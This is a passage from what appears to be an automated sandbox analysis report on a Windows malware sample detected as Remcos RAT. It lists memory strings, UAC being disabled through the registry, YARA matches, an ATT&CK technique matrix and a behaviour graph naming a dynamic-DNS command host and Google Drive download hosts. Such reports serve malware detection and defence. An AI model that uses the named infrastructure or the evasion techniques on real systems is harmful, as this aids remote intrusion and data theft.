          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTRI
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\[
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6)\Comm
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managertdesk@
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.000000000814A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1B

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Disables UAC (registry)
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
          Source: Amcache.hve.33.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Detected Remcos RAT
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4DJump to behavior
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		11
          Input Capture          		3
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts11
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		1
          Obfuscated Files or Information          		LSASS Memory24
          System Information Discovery          		Remote Desktop Protocol11
          Input Capture          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)12
          Process Injection          		1
          Software Packing          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		1
          Remote Access Software          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
          Masquerading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeylogging213
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Modify Registry          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Process Injection          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502984 Sample: anziOUzZJs.exe Startdate: 02/09/2024 Architecture: WINDOWS Score: 100 53 a458386d9.duckdns.org 2->53 55 drive.usercontent.google.com 2->55 57 drive.google.com 2->57 69 Found malware configuration 2->69 71 Multi AV Scanner detection for dropped file 2->71 73 Multi AV Scanner detection for submitted file 2->73 77 5 other signatures 2->77 9 anziOUzZJs.exe 32 2->9         started        13 svchost.exe 1 1 2->13         started        signatures3 75 Uses dynamic DNS services 53->75 process4 dnsIp5 43 C:\Users\user\AppData\Local\...\BgImage.dll, PE32 9->43 dropped 45 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 9->45 dropped 47 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 9->47 dropped 81 Suspicious powershell command line found 9->81 16 powershell.exe 5 29 9->16         started        59 127.0.0.1 unknown unknown 13->59 file6 signatures7 process8 dnsIp9 49 drive.usercontent.google.com 142.250.181.225, 443, 49729 GOOGLEUS United States 16->49 51 drive.google.com 142.250.184.238, 443, 49726 GOOGLEUS United States 16->51 39 C:\Users\user\AppData\...\Partivarerne.scr, PE32 16->39 dropped 41 C:\ProgramData\remcos\logs.dat, data 16->41 dropped 61 Detected Remcos RAT 16->61 63 Drops PE files with a suspicious file extension 16->63 65 Found suspicious powershell code related to unpacking or dynamic code loading 16->65 67 2 other signatures 16->67 21 cmd.exe 1 16->21         started        24 cmd.exe 1 16->24         started        26 WerFault.exe 23 16 16->26         started        28 2 other processes 16->28 file10 signatures11 process12 signatures13 79 Uses cmd line tools excessively to alter registry or file data 21->79 30 reg.exe 1 21->30         started        33 conhost.exe 21->33         started        35 conhost.exe 24->35         started        37 reg.exe 1 1 24->37         started        process14 signatures15 83 Disables UAC (registry) 30->83

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.